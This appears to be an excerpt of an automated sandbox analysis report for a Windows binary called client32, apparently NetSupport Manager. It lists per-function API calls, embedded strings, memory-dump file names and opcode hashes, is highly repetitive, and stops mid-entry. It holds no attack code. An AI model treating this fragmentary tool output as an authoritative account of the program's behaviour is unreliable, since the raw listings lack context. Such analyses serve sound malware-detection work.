                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                        • String ID: 0
                                                        • API String ID: 2755257978-4108050209
                                                        • Opcode ID: 49b977d40c07f5e2c66648d899f03e2c19a34532f2eedabc1b5daecf0946c252
                                                        • Instruction ID: 6013c0d9d1bdd2596c58563bf639684a5b16c11bd1ef64a9a4ff28934d00860a
                                                        • Opcode Fuzzy Hash: 49b977d40c07f5e2c66648d899f03e2c19a34532f2eedabc1b5daecf0946c252
                                                        • Instruction Fuzzy Hash: 71316E71D01219AFEB01DFA4D885BEEBBFCEF4A798F008059F941A6240E7B59944CB60
                                                        Function 110311D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 1103122A
                                                        • _memset.LIBCMT ref: 11031261
                                                        • RegisterClipboardFormatA.USER32(?), ref: 11031289
                                                        • GetLastError.KERNEL32 ref: 11031294
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • _memmove.LIBCMT ref: 110312DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                        • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                        • API String ID: 2414640225-228067302
                                                        • Opcode ID: de00dd6ae2d3d7f906a03fecd9d9ec7b5d09c710752e4d4d289d86674a34989d
                                                        • Instruction ID: 14e8dd57a7feced4d25e4c3e85cd85d2286920d3da7b542c8ccc3d839dc859fc
                                                        • Opcode Fuzzy Hash: de00dd6ae2d3d7f906a03fecd9d9ec7b5d09c710752e4d4d289d86674a34989d
                                                        • Instruction Fuzzy Hash: 44318DB9A00706ABD714DF64C881F6AF3B4FF89708F14C558E9598B340EB70EA54CBA0
                                                        Function 110B1410 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(00000000), ref: 110B1448
                                                        • EnableWindow.USER32(00000000,00000000), ref: 110B1483
                                                        • EnableWindow.USER32(00000000,00000000), ref: 110B14AD
                                                        • EnableWindow.USER32(00000000,00000000), ref: 110B14DD
                                                        • EnableWindow.USER32(?,00000000), ref: 110B14E4
                                                        • EnableMenuItem.USER32(110B689C,00000000,00000002), ref: 110B14FE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Enable$Window$Menu$ErrorExitItemLastMessageProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 703148351-1557312927
                                                        • Opcode ID: 3c57b5d810544df76335c1307041a00c7c7120df7f96d05c297ab18d3a0fa9b2
                                                        • Instruction ID: c715c16d4c75479b9699dac4ef5c5b91c87fbe03cd8a25a8d52e0fd67f325f0a
                                                        • Opcode Fuzzy Hash: 3c57b5d810544df76335c1307041a00c7c7120df7f96d05c297ab18d3a0fa9b2
                                                        • Instruction Fuzzy Hash: 5021F675F40612BBC315DB75DC84FDAFBA5BF45218F048128EA085B181EB34A851CBE5
                                                        Function 11025740 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Warning. IPC msg but no wnd. Waiting..., xrefs: 110257BF
                                                        • HandleIPC ret %x, took %d ms, xrefs: 11025810
                                                        • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11025827
                                                        • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11025798
                                                        • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11025779
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$Sleep
                                                        • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                        • API String ID: 4250438611-314227603
                                                        • Opcode ID: f0b4fd3c98b5580777bb38eafbc8a38d8b1eb00d735c0e8546a73c597d21ad9a
                                                        • Instruction ID: 856ebef11915e97a845ae59ce9eeaf6af0a263cab1a7eb4eff15662075c9ff21
                                                        • Opcode Fuzzy Hash: f0b4fd3c98b5580777bb38eafbc8a38d8b1eb00d735c0e8546a73c597d21ad9a
                                                        • Instruction Fuzzy Hash: FA21E6BAE11514AFD710CE59ECC4EABB3EDEBC8368F408529EC4A83244D531AC40DBA5
                                                        Function 11009480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strncmp.LIBCMT ref: 110094BA
                                                        • _strncmp.LIBCMT ref: 110094CA
                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,82E0FB89), ref: 1100956B
                                                        Strings
                                                        • https://, xrefs: 110094AF
                                                        • IsA(), xrefs: 11009525, 1100954D
                                                        • http://, xrefs: 110094B5, 110094C8
                                                        • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 110094F1
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009520, 11009548
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strncmp$FileWrite
                                                        • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://$https://
                                                        • API String ID: 1635020204-3133059256
                                                        • Opcode ID: b11a3e4c238259d2fbc588d12090e526e1a57e1cc9220299ac93f4f0d3e75ca9
                                                        • Instruction ID: f49766fd7765917b195ffb41f19f8f79b4adc18e23b7e5197df46bfb74996d4c
                                                        • Opcode Fuzzy Hash: b11a3e4c238259d2fbc588d12090e526e1a57e1cc9220299ac93f4f0d3e75ca9
                                                        • Instruction Fuzzy Hash: 8B318B7AE0061AABDB11DF85CC44FDEF7B8FF49654F008158F815A7280EB34AA04CBA1
                                                        Function 1110B730 Relevance: 13.7, APIs: 9, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 1110B7AA
                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1110B7BC
                                                        • GetSystemMetrics.USER32(00000002), ref: 1110B7CA
                                                        • GetSystemMetrics.USER32(00000003), ref: 1110B7DF
                                                        • GetSystemMetrics.USER32(0000004E), ref: 1110B829
                                                        • GetSystemMetrics.USER32(0000004F), ref: 1110B833
                                                        • GetSystemMetrics.USER32(00000000), ref: 1110B846
                                                        • GetSystemMetrics.USER32(00000001), ref: 1110B859
                                                        • GetWindowRect.USER32(?,?), ref: 1110B8C6
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004C), ref: 1108E4DE
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004D), ref: 1108E4E7
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004E), ref: 1108E4EE
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(00000000), ref: 1108E4F7
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004F), ref: 1108E4FD
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(00000001), ref: 1108E505
                                                          • Part of subcall function 1108E460: _memset.LIBCMT ref: 1108E48F
                                                          • Part of subcall function 1108E460: FreeLibrary.KERNEL32(00000000,?,75A44920,1110B942,00000002), ref: 1108E49A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
                                                        • String ID:
                                                        • API String ID: 314733930-0
                                                        • Opcode ID: d7eadc563fd8f1edf11073224b815364cadfebc45bd2c66acbb8496d4c6402ae
                                                        • Instruction ID: 2a0a03e10d028b360f6a22ee55a987c1a255e6312d7f70e3124523d6712918fa
                                                        • Opcode Fuzzy Hash: d7eadc563fd8f1edf11073224b815364cadfebc45bd2c66acbb8496d4c6402ae
                                                        • Instruction Fuzzy Hash: 2C610B75D0066A9FDB14CF68C984BEDF7F4FB48704F0045AAD91AA7284DB70AA84CF90
                                                        Function 110C3120 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102BC0: GetCurrentThreadId.KERNEL32 ref: 11102BCE
                                                          • Part of subcall function 11102BC0: EnterCriticalSection.KERNEL32(00000000,75A33760,00000000,111DBD28,?,110C3135,00000000,75A33760), ref: 11102BD8
                                                          • Part of subcall function 11102BC0: LeaveCriticalSection.KERNEL32(00000000,75A4A1D0,00000000,?,110C3135,00000000,75A33760), ref: 11102BF8
                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,75A33760,00000000,75A4A1D0,1105952B,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C313B
                                                        • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C3168
                                                        • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C317A
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C3184
                                                        • IsDialogMessageA.USER32(00000000,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C319B
                                                        • LeaveCriticalSection.KERNEL32(00000000,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31B1
                                                        • DestroyWindow.USER32(00000000,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31C1
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31CB
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C31E1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                        • String ID:
                                                        • API String ID: 1497311044-0
                                                        • Opcode ID: 6191cf186c74ae9112f6ea8ce94e4a318c72d3598519386d6d3182dab2fc4e7e
                                                        • Instruction ID: 3c1e887d7967a67240c1c164b22fb9d4592e7ef048b6f648851657ace213bb1e
                                                        • Opcode Fuzzy Hash: 6191cf186c74ae9112f6ea8ce94e4a318c72d3598519386d6d3182dab2fc4e7e
                                                        • Instruction Fuzzy Hash: 9821C436B15214AFE711DFA8EC84BDEB7B8EF86765F1440A5F909DB240D771A9008BE0
                                                        Function 1100D390 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,111838B8), ref: 1100D3A4
                                                        • GetProcAddress.KERNEL32(00000000,111838A8), ref: 1100D3B8
                                                        • GetProcAddress.KERNEL32(00000000,11183898), ref: 1100D3CD
                                                        • GetProcAddress.KERNEL32(00000000,11183888), ref: 1100D3E1
                                                        • GetProcAddress.KERNEL32(00000000,1118387C), ref: 1100D3F5
                                                        • GetProcAddress.KERNEL32(00000000,1118385C), ref: 1100D40A
                                                        • GetProcAddress.KERNEL32(00000000,1118383C), ref: 1100D41E
                                                        • GetProcAddress.KERNEL32(00000000,1118382C), ref: 1100D432
                                                        • GetProcAddress.KERNEL32(00000000,1118381C), ref: 1100D447
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 6cfae3bc05f78b54d57e16c39f9828ee7bdb482090c8a32c341ca59fd490a75c
                                                        • Instruction ID: 1d850f4dc722c529ab0345deb5e5c80d8d70567c8a52cd3e1e9a14db29bad8e3
                                                        • Opcode Fuzzy Hash: 6cfae3bc05f78b54d57e16c39f9828ee7bdb482090c8a32c341ca59fd490a75c
                                                        • Instruction Fuzzy Hash: 4D31BEB1922630AFEB11CB65C8D8B5AF7E9A34C348F05827ADC298365CD7749441CF62
                                                        Function 11045030 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 327windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(?), ref: 110450E1
                                                        • _malloc.LIBCMT ref: 1104517D
                                                        • _memmove.LIBCMT ref: 110451E2
                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001042A,00000005,00000002,00002710,?), ref: 11045242
                                                        • _free.LIBCMT ref: 11045249
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11041AF0: _free.LIBCMT ref: 11041B77
                                                          • Part of subcall function 11041AF0: _free.LIBCMT ref: 11041B97
                                                          • Part of subcall function 11041AF0: _strncpy.LIBCMT ref: 11041BC5
                                                          • Part of subcall function 11041AF0: _strncpy.LIBCMT ref: 11041C02
                                                          • Part of subcall function 11041AF0: _malloc.LIBCMT ref: 11041C3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                        • String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
                                                        • API String ID: 3960737985-2967710367
                                                        • Opcode ID: f331cf77ee246184c656352fa7ac13d13ab4c8c0cd8c648676b23c116166795e
                                                        • Instruction ID: 815efef73f6f8acdca62cf46f73826a5586355b94afe20fa4b17fb913d10d18d
                                                        • Opcode Fuzzy Hash: f331cf77ee246184c656352fa7ac13d13ab4c8c0cd8c648676b23c116166795e
                                                        • Instruction Fuzzy Hash: C9C18374E006069FDB04DFA4C8D0EDEF7F5BF89308F208169E51AAB695DB71A905CB90
                                                        Function 1103B500 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 319COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _malloc.LIBCMT ref: 1103B593
                                                        • _memset.LIBCMT ref: 1103B5A1
                                                        • _memmove.LIBCMT ref: 1103B5AE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 1103B280: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111D903C), ref: 1103B2B1
                                                          • Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
